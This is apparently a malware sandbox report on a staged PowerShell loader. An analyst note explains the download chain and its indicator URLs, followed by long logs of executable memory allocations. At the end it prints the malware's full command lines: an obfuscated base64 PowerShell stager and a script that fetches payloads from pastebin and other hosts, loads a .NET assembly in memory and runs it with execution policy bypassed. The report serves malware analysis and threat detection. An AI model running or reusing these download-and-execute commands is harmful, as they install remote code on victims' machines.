Note: the stage-2 script fetches the pastebin URL into dll01.txt and then downloads whatever URL that file contains, so the firebasestorage.googleapis.com URL is evidently the paste's content at analysis time — a mutable pointer the operator can re-target without changing the sample. That second fetch is the DownloadString call that returned "(400) Bad Request" in the console output. The third-stage argument `txt.5202ffetsos/sdaolnwod/egroeg/4152egroj/gro.tekcubtib//:sptth` is a reversed string (https://bitbucket.org/jorge2514/george/downloads/sosteff2025.txt, presumably reversed by the loaded assembly); it is absent from this list because stage 3 failed before it could be requested. All three URLs are indicators worth recording even though only two were contacted in this run.
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c72000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c73000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c74000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c75000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c76000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c77000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c78000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c79000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\dll03.ps1
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0
★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\dll03.ps1
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp\sostener2.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
cmdline powershell.exe $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt
